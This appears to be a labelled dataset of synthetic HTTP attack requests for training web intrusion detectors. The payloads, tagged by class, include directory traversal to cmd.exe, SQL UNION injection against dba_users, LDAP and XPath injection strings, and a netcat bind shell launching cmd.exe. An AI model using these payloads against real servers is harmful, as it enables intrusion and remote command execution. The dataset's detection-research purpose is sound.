Transfer-Encoding: identity
Upgrade: pil1/7.3, dxAvc/4.0
Warning: 814 www.sz2gl.html "et0hhawps" "Sun, 03 Feb 08 08:33:56 UTC"
X-Forwarded-For: 230.76.2.187
X-Serial-Number: 239527167
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47025
Start - Id: 43886
class: OsCommanding
GET /_vti_bin/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 2.130.62.253
Connection: u7odnu3
Accept: audio/*;q=0.1, text/*
Accept-Charset: *
Accept-Encoding: deflate;q=0.7, gzip, deflate;q=0.2, deflate
Accept-Language: arj-rldio, T-lEsiDa
Cache-Control: max-age=1
Client-ip: 182.179.139.200
Cookie: UiaE0dN8TDm=7gihadmineotmpo
Cookie2: $Version="62"
Date: Tue, 25 Jul 06 21:02:46 GMT
ETag: "4p2ZiLBnvJxcMOdpmaxa"
Expect: 100-continue
From: 2bgyahe@ty1w.biz
If-Modified-Since: Sat, 29 May 04 23:57:30 UTC
If-Unmodified-Since: Mon, 01 Sep 08 18:24:09 GMT
If-Match: *
If-None-Match: *
If-Range: "XWT7r_E_qxlhhaAwheQj"
Max-Forwards: 6
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: Digest uri=/uiers/ieatYM/iCiR.tiff
Authorization: Basic cjh0b2JoTDpOaXRp
Range: 40517-,9-9675
Referer: http://in3hr.net/aIshtEn/aSaoh.php3
TE: chunked;q=0.4,trailers
Trailer: If-Match
User-Agent: Mozilla/0.3 (Windows; U; Windows NT 7.9; ge-ji; rv:2.3.4) Gecko/02636151
UA-CPU: Sparc
UA-Disp: 708,9864,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 349x5070
Via: HTTP/0.7 221.188.184.70
Transfer-Encoding: identity
Upgrade: oBor/5.4, bstr/6.6
Warning: 453 28.223.229.127 "anutRoc7" 
X-Forwarded-For: 115.236.50.254
X-Serial-Number: 245906346530085
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43886
Start - Id: 37247
class: LdapInjection
GET /eUjSKpW@f./wUenAF33rheqoz0tnrr/6siaTiqea.jpeg?I9RK--Efp7=%29+%28++++%7C%28displayName%3Dhad*%29+%28name+%3D+had*++%29%28mail%3Dhad*+++%29&avcaxeabrlh=gy.ziQFIp2 HTTP/1.0
Host: 85.179.243.138
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-arabic;q=0.7
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=4797
Client-ip: 214.3.71.252
Cookie2: $Version="13"
Date: Thu, 15 May 08 04:56:28 GMT
ETag: W/"8iqS6XOVjdhdKDP"
If-Modified-Since: Wed, 31 Mar 04 24:26:30 CET
If-Match: *
If-Range: "AGU2OlZNtrOh4AZp"
Max-Forwards: 194
Authorization: Basic YWFjdHJzODpvZm9kcw==
Referer: /ptseXmee/awdnne/5rlthe9l.mpg
Trailer: Via
User-Agent: nmn3htamhef2tvnayBrE
UA-CPU: 68000
UA-Color: color32
Via: 0.8 40.69.88.183, FTP/1.4 www.eeylu7t.gif:4876, 3.3 www.aooza3.jpg
Transfer-Encoding: gzip
----: ------------------------------------------

null

End - Id: 37247
Start - Id: 35341
class: SqlInjection
GET /hsiMMP01gK7MbsiC/2cODFn50/Q8QShtpassNg/ioTrRS/etbQvZ/BhDRZDnodeX/tii.js?orcynhllet=OR++++0488%3E106371810&ZxhttpfDF=or4&W3Wcwhere3izH=px1JULtiX3j&KDOH47andlV0dM=310&tsleU=tps+oh&ejRSni3keghcst=783&B5stdinEhgImetaESW=rtepwpnoNun1&oaepcRsdddi=lcIeieyRlqdums&rUa5u=1osR&eia0nid=t9shmhdyetrE3e&l2echo8fselectAE=aoeEdai HTTP/1.0
Host: 147.53.156.156
Connection: 9asmeh
Accept: */*;q=0.7
Accept-Charset: iso-8859-4;q=0.0, windows-1252
Accept-Encoding: identity;q=0.1, gzip;q=0.9, deflate;q=0.7, identity, deflate
Accept-Language: fyio-ruwxf2;q=0.1, nga-nwlNC0g;q=0.6
Cache-Control: ounntmpi=4e6h
Client-ip: 85.135.241.126
Cookie: 8iaiogt5TdN=sVi?eiel;tudwtgtfntredO=d mochadm;DzexecD=:s:stdinh asEy/eahoti@;ohetgj=vle];av
Cookie2: $Version="2"
Date: Fri, 10 Feb 06 16:49:55 GMT
ETag: W/"3xeU3JJzY4QgQz3Wd"
Expect: 100-continue
From: 2cs3fs@4loUnehlAe.it
If-Modified-Since: Thu, 13 Aug 09 07:14:53 UTC
If-Unmodified-Since: Sun, 15 Nov 09 12:13:24 CET
If-Match: *
If-None-Match: *
If-Range: "YQpP6vnPRrX77IlX"
Max-Forwards: 3622
MIME-Version: 1.4
Pragma: s='g7oc0'
Proxy-Authorization: Digest qop=rr6oiAyu
Authorization: Digest qop=auth-int
Range: 16442-228208
Referer: http://www.dnna.cz/dueurln/ooRa/gttan/tjnmob/sttltt86.asmx
TE: trailers,deflate
Trailer: Accept-Language
User-Agent: nI8J8MBF http://www.tirt.cz
UA-CPU: StrongARM
UA-Disp: 787,9099,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 5578x419
Via: 5.1 163.38.67.127, HTTP/8.7 www.1rwi.shtml, HTTP/7.1 www.tdrdo24t.jpg
Transfer-Encoding: compress
Upgrade: ohz/1.8
Warning: 597 www.ssytddta.jpg "8Lti" "Wed, 10 Mar 04 17:59:42 UTC"
X-Forwarded-For: 70.158.64.159
X-Serial-Number: 49332836434865921250
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35341
Start - Id: 41009
class: SqlInjection
PUT /o7nESs/_mUobjectX-HPevC/6eO@KRjYS/n0Sns5/eleHlif.css? HTTP/1.0
Content-Length: 114
Content-Language: Tarabo0
Content-Encoding: gzip
Content-Location: http://ciehAte.st/wsowa/cilm/nhgruun/qt0EE/rehI.cgi
Content-MD5: c2l2aXJwbmRwcmNhaGVuZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 03 Jun 07 06:04:35 UTC
Last-Modified: Thu, 07 May 09 11:08:51 CET
Host: www.2ertl.ch
Connection: keep-alive
Accept: video/mpeg;q=0.8, application/x-tar, audio/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: t16oC-6stni, G-tatu
Cache-Control: max-age=40
Client-ip: 103.167.168.13
Cookie: cl74agnripjeav=85759520;rh=44760;dmSoStOw=g
Cookie2: $Version="131"
Date: Mon, 29 May 06 23:58:54 UTC
ETag: W/"yB2VYqpUnbgTE.vlG9"
Expect: v0sro3=eghTm;eprtAa2
From: asetiay@nrooel.de
If-Modified-Since: Sat, 13 Jan 07 05:54:25 UTC
If-Unmodified-Since: Wed, 06 Aug 08 14:32:16 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 27 Jul 05 07:48:43 GMT
Max-Forwards: 7
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Digest response="Da7EBFf2e6D8F588b475adAdda612ba3"
Authorization: 9etso itrab=ohxvo2N
Referer: http://d0yolxe.com/W7jasnI6/lanibnu/t7geg/hdeab/rTrge.php
TE: deflate
Trailer: Expect
User-Agent: Mozilla/0.6 (Windows; U; Win 9x 9.0; to-uy; rv:4.5.4) Gecko/08579868
UA-Pixels: 892x2342
Via: 9.1 204.101.191.39:95704, FTP/4.1 170.126.25.12
Transfer-Encoding: identity
Upgrade: uw1/6.2, gcsmod/3.8, exeh/4.6
Warning: 164 www.jIwGs.png "tHplR" 
X-Forwarded-For: 134.103.78.204
X-Serial-Number: 0694203566390094
----: --------------------------
~~~~~: ~~~~~~~~~~~~

ektrR=86&it5o=lnelaisIouna&Ht=bulk     insert  jYcreagze from 'pwdump.exe'   with (codepage='RAW'  )

End - Id: 41009
Start - Id: 44806
class: PathTransversal
GET /btWN/zna0gA2daes/pcoqSjX/kk0Bsu/pYnQiXzytS3cN/ldsaSdetacs3/oJ/sZpmjzqKcp9n9KDWefaa/LformBbYAzY.mdb?Rn47tlu9eg=aUNMIUOW&1dpinoleitiuvno=.%2F..%2F.%2F..%2F&cngshhOeznnrh=bgsoundrjrtpnbetweenho HTTP/1.1
Host: www.nntea7w.it:80
Connection: keep-alive
Accept: image/gif, application/x-tar;q=0.0, application/rtf
Accept-Charset: *;q=0.4
Accept-Encoding: compress;q=0.3, compress;q=0.0, deflate;q=0.2, gzip, deflate;q=0.1
Accept-Language: *
Cache-Control: Loo='at8se'
Client-ip: 162.199.90.42
Cookie: uxl2p-JAj98=iet
Cookie2: $Version="8"
Date: Tue, 05 Jun 07 20:23:55 GMT
ETag: "5dTB3_gAXG5Nx4RIfSTO"
Expect: 3wznn
From: srwYoiR5@1klnww.fr
If-Modified-Since: Sun, 19 Dec 04 01:55:59 UTC
If-Unmodified-Since: Mon, 28 Apr 08 19:47:53 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 28 Dec 04 21:14:45 CET
Max-Forwards: 5
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: Basic ZWVlYmloMTpvYWxyb2Yx
Authorization: ikho9 ta2z=kpen
Range: -970
Referer: /3io1Eo.js
TE: deflate,deflate;q=0.5,chunked;q=0.1
Trailer: Pragma
User-Agent: Mozilla/3.9 (compatible; MSIE 5.6; Mac OS X; ei9seAliro)
UA-CPU: x86
UA-Disp: 5653,4264,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 5717x165
Via: 0.4 www.8weoon.htm:343, d9Or/5.4 104.179.210.207
Transfer-Encoding: identity
Upgrade: neacoe/5.1, 7qfTia/9.7, negety/9.4, hbiry/6.4
Warning: 444 49.226.175.61:095 "anooncjio" "Wed, 26 Jul 06 23:48:52 GMT"
X-Forwarded-For: 232.35.194.78
X-Serial-Number: 42053074878
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44806
Start - Id: 42592
class: SqlInjection
GET /yeuxat4NAvueta/binput4enchtpasspHA/Xphpn3FX22/tXhhNU1yycsE3rW1EAi/e5CBL3aatmtln9i/2q0M.P-o9EtlsdpQmk/nralna3t2o/nbXAZSMaMJa5t4/it.asp?@ISe=z74A1Jb7aFb%40&rMH9=9986&etkmr=iwpt&lsuvrlPm6xl=1Zq&l5Nrssa=chairs%27++UNION++++SELECT+++heMbwclma++++FROM+++dba_users++++WHERE++name++++like++%27%2525&tZvarSX7an=mdgsieA1c6ehy9s&_ZAAKgG@e=seebxslc1edbhsro&efu6fbreoeuqo=l3eeg6iphn HTTP/1.1
Host: 139.42.32.16
Connection: close
Accept: image/*, video/*;q=0.5
Accept-Charset: cp-932;q=0.0
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 2.110.69.195
Cookie: nsot=8QO;x@Rx=7uaWeonhaecanag;Oo6du-JcN=89530984;l4bsnnafare=350;moasiOh4I=sfaIxd7saseaa
Cookie2: $Version="502"
Date: Thu, 15 May 08 17:06:50 UTC
ETag: "htxw_uK4_0z1HSarAA"
Expect: siHyt5
From: tmTstilr@oerx.it
If-Modified-Since: Sun, 09 Jan 05 10:20:21 UTC
If-Unmodified-Since: Wed, 24 Oct 07 16:56:11 CET
If-Match: "U.eTCu-t1pQUGgMn"
If-None-Match: *
If-Range: ".i0RC-BNWzZKkalv"
Max-Forwards: 2767
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: Basic YXJ0MTpkaVNiYW4=
Authorization: Basic ZWF0aTplbDlybXQ=
Range: 5-,-2176,0697-71705
Referer: http://www.jpou.it/ueCawtb/ete0/Ntf9.html
TE: trailers,chunked;q=0.9,trailers
Trailer: Host
User-Agent: Mozilla/4.9 (X11; U; Linux i386 0.1; os-hc; rv:0.6.7) Gecko/95517039
UA-CPU: MIPS
UA-Disp: 8242,0192,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 4922x3138
Via: FTP/0.5 117.119.91.234, coD/1.9 www.taae.js, Gex/7.5 97.23.0.126
Transfer-Encoding: srsy
Upgrade: r8az/4.5, ShnfKa/1.6, Ne8h/2.3, uo3m/9.4, baps/3.8
Warning: 765 www.ningpa.jpg "haujs3gtxtukti7rmtti" "Wed, 08 Aug 07 04:54:20 CET"
X-Forwarded-For: 149.227.177.29
X-Serial-Number: 89713741
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42592
Start - Id: 37223
class: LdapInjection
GET /BgtaiaeenMwiloOhn/o5G/uubsnregepisraJenb/opewtntiip/eihemdE/h6._PZi/ab.y5UaAQBCHerDZ/Qgp-wp/auu0Pscript/aJvrit7TxsxVacceptOform/xairnrrAtSrr3mecLk.js?soessyew=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29 HTTP/1.1
Host: 243.133.148.113
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: compress, compress, deflate;q=0.7, identity, deflate
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 60.153.84.246
Cookie: aubaeit=htdozear;BuaHt4hla0=41
Cookie2: $Version="943"
Date: Wed, 22 Jul 09 16:21:30 GMT
ETag: "czNQPVvyxU6hhOg3"
Expect: eesgne
From: soETt@snjTsesiy.ch
If-Modified-Since: Sun, 04 Dec 05 05:15:31 CET
If-Unmodified-Since: Tue, 12 Jan 10 07:20:16 GMT
If-Match: "WUclZDkjrH9trt3mOL"
If-None-Match: *
If-Range: "83QeKP2tOsIEuL.Is_H"
Max-Forwards: 89
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Digest opaque="OnuSrle"
Range: -035
Referer: /aiOa/llmxe.mdb
TE: deflate;q=0.0,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/2.8 (Machintosh; U; PPC 5.3; eg-un; rv:5.6.4) Gecko/04118756
UA-CPU: Sparc
UA-Disp: 5765,446,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 0874x8291
Via: 8.1 www.osniapu.css, nnpfg/8.0 213.147.44.108
Transfer-Encoding: deflate
Upgrade: cleeI/2.9, MCtE/0.6, Tse/6.1, rge/4.6, esEkld/2.9
Warning: 553 www.Nftmdh.html "rnvarnu59oDgV" "Mon, 31 Oct 05 08:57:55 UTC"
X-Forwarded-For: 217.7.45.94
X-Serial-Number: 6125888120421069
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37223
Start - Id: 41363
class: SqlInjection
PUT /ci7oot.html? HTTP/1.0
Content-Length: 222
Content-Language: neesn
Content-Encoding: deflate
Content-Location: /njarmE3t.swf
Content-MD5: ZWdkZWxTU280RHdybmFtOQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 08 Apr 09 05:37:39 CET
Last-Modified: Sun, 29 Mar 09 04:42:00 CET
Host: www.aurr.net
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: x-mac-icelandic;q=0.2, shift_jis;q=0.5, big5;q=0.5
Accept-Encoding: 
Accept-Language: e-rbzick, tlwdst-own5tsvo;q=0.1, O-5set, ai-g3teilb, lttjeot-noe;q=0.3
Cache-Control: max-age=2
Client-ip: 200.4.215.226
Cookie: nsndfebcapi=01517941;RQI.=nhicognnsa
Cookie2: $Version="6"
Date: Sun, 21 Jan 07 10:50:10 GMT
ETag: W/"J_IZ-Sru.NlxdAHqGD"
Expect: 100-continue
If-Modified-Since: Sun, 05 Sep 04 23:00:03 CET
If-Unmodified-Since: Wed, 14 Sep 05 21:24:23 CET
If-Match: "SWFru0JFVzrFD92"
If-None-Match: *
If-Range: "RNv@t1doaOCA6mlkV4U"
Max-Forwards: 11
MIME-Version: 2.2
Pragma: lg5=n
Proxy-Authorization: NTLM dG9ub1NydW50OUF5YWJudHluc3RhQnphaHB1d2l6dmFkaTRGdmlobnM=
Authorization: slrj iSieor=iOaoa
Referer: /rrtas/i6edxThN.cfm
TE: trailers
User-Agent: Mozilla/8.8 (Windows; U; Windows NT 7.7; nh-ae; rv:4.5.5) Gecko/81682467
UA-Disp: 557,1073,8
UA-OS: Windows 98
Via: 9.7 129.117.251.55:96324, stwN/6.7 119.26.188.85
Transfer-Encoding: identity
Upgrade: nhetgd/3.9
Warning: 522 63.253.58.196 "esHrot6irna" 
X-Serial-Number: 309660
----: ------------------------------------

ra=tE&r5dtmkioihti= &70izblerHjrepm=greplaceyci<os&ftocey='  /**/ OR   /**/''  ='&nz=boc&SVCTNF=r1U?8ntdylio&VX@ERUcnetcat=1206&xHormhefr1=41593&anertieAb8cmqr=2&rcto4p=zDiUlqlk&ermt=faya7esfttscajoat

End - Id: 41363
Start - Id: 48529
class: XPathInjection
PUT /elVMnvhVdp/2exvt3eeeors6/c7liW_kzDc1X-bE1iWfx/svq9Wx.jpeg? HTTP/1.0
Content-Length: 337
Content-Language: 5,eaninqio
Content-Encoding: identity
Content-Location: /cAed/6hscpz.doc
Content-MD5: dWF0aHluZW9ldGE0ZXN0dA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 13 Feb 10 05:35:39 GMT
Last-Modified: Thu, 20 Jan 05 18:36:12 GMT
Host: www.Tstsds.biz:80
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: x-mac-arabic
Accept-Encoding: deflate;q=0.7, gzip, compress
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 246.80.217.154
Cookie: erb=rno6arn;e8fNyedo=li6;F1X.zorWpvYiH=a
Cookie2: $Version="5"
Date: Tue, 17 Apr 07 07:10:01 GMT
ETag: W/"tBZi-pENw9GtkAl"
Expect: 100-continue
From: hpeced@ekqiej.it
If-Modified-Since: Sun, 09 Aug 09 17:25:54 UTC
If-Unmodified-Since: Mon, 11 Sep 06 04:36:49 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 03 Jun 07 13:56:17 CET
Max-Forwards: 63
MIME-Version: 9.6
Pragma: aScsv='Tha8eBn'
Proxy-Authorization: mtlwdi eSfIe=ftEqwcOT
Authorization: Digest nc=8bc4Ad29
Range: 51-93,35-2637,65821-
Referer: http://1jfK.it/rtsim/dnere/r5emd/oeidqe/8snhsto.js
TE: trailers,trailers,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/2.8 (compatible; eaaqdOS; Windows NT; reNMyts)
UA-CPU: x86
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 3038x174
Via: FTP/6.9 www.rl22ie.jpeg
Transfer-Encoding: gzip
Warning: 437 242.254.172.181 "wwyyel6" "Tue, 23 Aug 05 14:58:53 GMT"
X-Forwarded-For: 104.189.251.216
X-Serial-Number: 7572286452988
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

lj9ean7oos9de=iigkrnt&nhucntsnauovu=wZt77&ee3nehoaP8es7=aia-ore(oo6tril\e&yBaM4aeml8tenE=89486&rwoesemi9as0=nDc._laoBrBl&lhqoeata=ye+%&upet6ugttze=9IX&rCKEle9teao6ndr=Hviisbacceptbeays&TssQsrr=364   or    1<     eEmUit/Ed/o/child::text()[position()=185]    or 29='] | /* | /foo[bar='

End - Id: 48529
Start - Id: 38555
class: LdapInjection
GET /awm1lmbbZ/orerusm6deraz0/an6hcuc/CStiabnhatwl5m/oUe26Qt7.K/esrTV-ZXa.ldHzRz/rlikenPkj28eGQbQI0.jpg?BOo5ncir9rmsts=etitthth&jeskrfrtelmie=+&r4oentbqx0uh=B&a7SDl3adminE=s8i%2F%3C%7Equ9tncacceptIa&kbgsound_mochazfUO=as6_S%40%40Sm%40LE&haoywuneachtg=ocoig&5a8mkazaaahcd=ioricr&6Ntethnaaan=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&feqiE6=6tmu4E6oaaea&ahoauoretesea8=t%409ww&lcisrbtlbThcowo=bde%3Bmrrg%5Dwlaan+%40db HTTP/1.1
Host: www.fermadq9.gov:80
Connection: uvimo
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: hlsgtetp=snns
Client-ip: 40.99.33.206
Cookie: LiRmckNfromz=59723972;seeoiaod8eio=60;nMat=21
Cookie2: $Version="4"
Date: Mon, 15 May 06 14:40:24 CET
ETag: W/"@tyb3ncQYBWwihXP"
Expect: elny
From: sboOl@somecEl2.ch
If-Modified-Since: Tue, 08 Apr 08 15:10:53 UTC
If-Unmodified-Since: Thu, 19 Jun 08 15:18:15 CET
If-Match: "i-3uQdIjYX_@OZpvIJP"
If-None-Match: *
If-Range: Sun, 10 Jan 10 22:54:29 GMT
Max-Forwards: 37
MIME-Version: 2.4
Pragma: eaaFt=ihzNt
Proxy-Authorization: ohceo eebrth=greetthm
Authorization: NTLM eGh3aFRJZDJpdWE5dW1yc29lYW9zbzVoTm94SU5uU2hieWRhZGFuZQ==
Range: 0-592893,7-227,398-
Referer: /yueyrg/titP.bin
TE: gzip
Trailer: Transfer-Encoding
User-Agent: eank (e4ulhqu; sVU_DP)
UA-CPU: 68000
UA-Disp: 967,395,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 8726x4401
Via: FTP/4.2 117.2.41.195, 2.2 74.104.235.99, FTP/3.0 221.114.205.240
Transfer-Encoding: uds5Fy; yiecat2=LavaT7a
Upgrade: AwoFtN/5.6, vmGs2/6.3, lsee/0.5, mxjple/8.1
Warning: 257 www.nege.css "tabeoWaOoehrErrknae" "Fri, 05 Jun 09 24:03:11 UTC"
X-Forwarded-For: 157.225.217.71
X-Serial-Number: 30599
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38555
Start - Id: 42894
class: OsCommanding
GET /tmz/7r/vGaOFH2WiTDry97wlhzK/dtlf/bRYXrVBxtermAmMow/iEpPVHq3Vz1fiSdQOV/a8rgtnse/lsearmrzorots5odlmt/efKSc0Kn/xVmochav-bgsoundoC/i-GInl7qq8FcODt/BDxp_htaccesKMPhttp3vKeJ.asmx?iiz7Tt=neeriserh&shlaen1Pennr=g%26adelete%3C&O-VDDI=ottniascriptn7window.opene%3BAh%26eyl&sasncmjgSe7s=65828325&teiroryhdau=kv3aeioelsH&isjc=83&Oacheiks6gektaa=4091919749&C3w557arR=2&sdo=sni9nhtpass%3FdAsq&aylscieeH=%7C++shell%28++%22cmd++++%2Fc++++c%3AInetpubwwwrootMSISSnc.exe+-l++-p+++2005++-t++-e+cmd.exe%22%29+%7C+++%27&iis=%5Cievar%40dhttpsffi&eenlew23t=4 HTTP/1.0
Host: 171.225.223.220
Connection: close
Accept: application/*;q=0.2, text/html, image/jpeg;q=0.5
Accept-Charset: macintosh;q=0.6, macintosh, us-ascii;q=0.8, iso-8859-8-i;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.9
Cookie2: $Version="7"
Date: Fri, 12 Jan 07 19:14:49 UTC
Expect: torrt
From: 9r5eS@ryrh.be
If-None-Match: *
Max-Forwards: 739
Authorization: Basic ZWNkYWVpOnVyM2VocA==
Referer: /Olagm6uo/7mpeprT/oconyr/dhtSjats/eawn.jpeg
TE: trailers,trailers,trailers
User-Agent: Mozilla/9.6 (compatible; MSIE 3.1; Win 9x; as6a; lsiuohmsa; nghr)
Transfer-Encoding: identity
----: ----------------------------------

null

End - Id: 42894
Start - Id: 35566
class: XPathInjection
POST /group byg3aWkBGS-8dnR/mruQ/nbah3dedzemt/eplopg63fgNkeea/1NLPYGNlu/59S/EUnuso/m7uNEu/y_Uheh-a/axyd/re0duHyu5aueenSsO/cC0Yju-kGG2pDg_N.png? HTTP/1.0
Content-Length: 268
Content-Encoding: compress
Content-Location: http://www.eneh.biz/gnsec/gIs0iUf/sagshtpv/hOrAsqo/miuorh.asp
Content-MD5: RGVhcGVmdW1yc2VhYWdlZA==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Sun, 02 Sep 07 15:05:02 CET
Host: www.Reihece.fr
Connection: close
Accept: */*;q=0.6
Accept-Charset: windows-1258, x-mac-japanese, windows-1253
Accept-Encoding: *;q=0.6
Accept-Language: eb-aco;q=0.0
Cache-Control: max-stale
Date: Thu, 03 Mar 05 20:15:33 UTC
If-Modified-Since: Mon, 29 Jun 09 21:17:12 GMT
If-Range: "FgdN5eUc4Q-yS@HkQ"
Max-Forwards: 208
Pragma: odde=rt1mros
Referer: http://www.otWSu.org/Cbgautd.sh
User-Agent: Mozilla/9.0 (X11; U; Open BSD i586 1.0; h4-lr; rv:0.4.9) Gecko/85976950
UA-Color: color16
UA-Pixels: 101x5961

whPnLynooioe3lI=9758&adiuhtoqHcia=fleweobWdaileo&9Pdropwv=caEswltrnant5r&wwpugsiYSwt7p=rregsotelnetvbscripts&miraa=bni/escErm/b/child::node()[position()=321] or    'e5'=    '&phosiini0=ncXak@OGt&xo=2462511&tntvac=048&8gBy.php=65803301

End - Id: 35566
Start - Id: 49185
class: XPathInjection
GET /oNhrtdi/iRt/ck245LssD_p.exe?ElCf=yt&vY=sPvjQvVqso&90gudststetOaoM=%5DFs%3C&ie7iae=tmfZ5vb&aen87tcbsiu=5980&hecloehpamlTtem=sxne&V8bgsoundnullK5rcpBcmdwiP=eh%7Ctes9%3F&JjIbIc=2600+++++or+++++oiidt%2FTge4el%2Fgo6%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D443%5D+++or+++++93297%3D HTTP/1.1
Host: www.anrvm.fr:1
Connection: close
Accept: */*;q=0.2
Accept-Charset: iso-2022-kr, iso-8859-4;q=0.4
Accept-Encoding: gzip, compress
Accept-Language: *
Cache-Control: max-age=96278
Client-ip: 69.65.142.204
Cookie: wtmltdwpeee=3086
Cookie2: $Version="33"
Date: Wed, 30 May 07 18:16:16 CET
ETag: "vrp1kGmnEHoBox1Rdwu"
Expect: 100-continue
From: ir0psea@aO25fruan.gov
If-Modified-Since: Mon, 31 Aug 09 03:45:58 GMT
If-Unmodified-Since: Mon, 27 Nov 06 21:44:35 GMT
If-Match: "Zsjb@xKUqr93hB47Uynt"
If-None-Match: *
If-Range: *
Max-Forwards: 9639
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: Basic bnRlbHdoZXc6bnRpZQ==
Authorization: Digest realm
Range: 87-,-69535,7135-70843
Referer: /tmloEh/giefa/smdI/7dbjtuif/tnCi.exe
TE: trailers,gzip,gzip;q=0.6
Trailer: Connection
User-Agent: yiyedohM (f_VW65rdD)
UA-CPU: x86
UA-Disp: 577,972,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 400x881
Via: FTP/0.0 www.dseSe.shtml, 6.9 18.115.225.102
Transfer-Encoding: a0e2uW
Upgrade: q8iste/1.0, ici/0.5, qtyr3/1.9, oea/6.5, h1e5st/7.2
Warning: 858 www.efhrohf.jpg "oIntdrztcn98" 
X-Forwarded-For: 19.241.14.123
X-Serial-Number: 6850092
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49185
Start - Id: 45624
class: PathTransversal
GET /o.3KYJfZP@6qBD@63H/cl5/metaCeKqq/Eek8gadr8mtesort/E21q4A0WNyL_1/2cancO3meynRlenamge.js?EayR=18231&deletejTRZJGRxx=r%3A%5Cautoexec.bat HTTP/1.0
Host: www.h2eO.com
Connection: close
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: identity;q=0.8, compress;q=0.9, gzip;q=0.3, identity;q=0.7
Accept-Language: n-eidIf0ca, kekodtp-hn, I-alsnr, Nyce-ha;q=0.5
Cache-Control: max-age=4
Client-ip: 195.95.107.247
Cookie: A4xp_dzz39=4zVi
Cookie2: $Version="85"
Date: Wed, 11 May 05 15:57:48 GMT
ETag: W/"e-05gzKLIPTgpb.sl0"
Expect: seoOtore
From: d0eeeh@siwe.fr
If-Modified-Since: Thu, 08 Apr 10 03:22:33 CET
If-Unmodified-Since: Sat, 28 Jun 08 14:49:15 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 11 Sep 06 19:44:15 GMT
Max-Forwards: 036
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: Basic bnloYVQ6aXNydGh0eXM=
Authorization: Digest response="AAECA8adEca0bFA49EEee6Fd9B3a8488"
Range: 41-9272,-212,7881-582
Referer: /snfeTrq/tatlion7/bmbgs7ni/wtea8l/7lia.cfm
TE: deflate;q=0.2,deflate,trailers
Trailer: Transfer-Encoding
User-Agent: imtenes/3.9.2.2.3
UA-CPU: Sparc
UA-Disp: 6050,986,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 0039x975
Via: FTP/3.1 www.epolm.html
Transfer-Encoding: compress
Upgrade: wdths/1.4, ocajr/8.7, hnt/8.6
Warning: 979 249.143.44.161 "mpeqyef6" 
X-Forwarded-For: 48.145.225.109
X-Serial-Number: 749320741
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45624
Start - Id: 38402
class: LdapInjection
GET /tohE8fh/1etcpmmGi_Qp/uutesuEa2wt5orn/r@PYUlq6P1sxemep86/3S5YnQd/a0e3ec/b3oyosnhjodh6rrlhtU/sbddNttarwejpojhgrou/7NQhttpBnc/eh1/5spZt0ouIuN0xdyo2dF/0o6aheyoaimb.exe?r8gynnE=deirTx%280%3Auini0d%7ELse&unfnOotaeolS=63%29%28%26%28objectClass%3Dhca%29%28%7C%28sn%3D++qgES%29%28cn%3Dtdc+++J*%29%29&edaEoletemc=dnoden&onaolm=ieval&hyr=soql HTTP/1.0
Host: 99.215.65.213
Connection: close
Accept: application/postscript;q=0.8, application/*;q=0.4
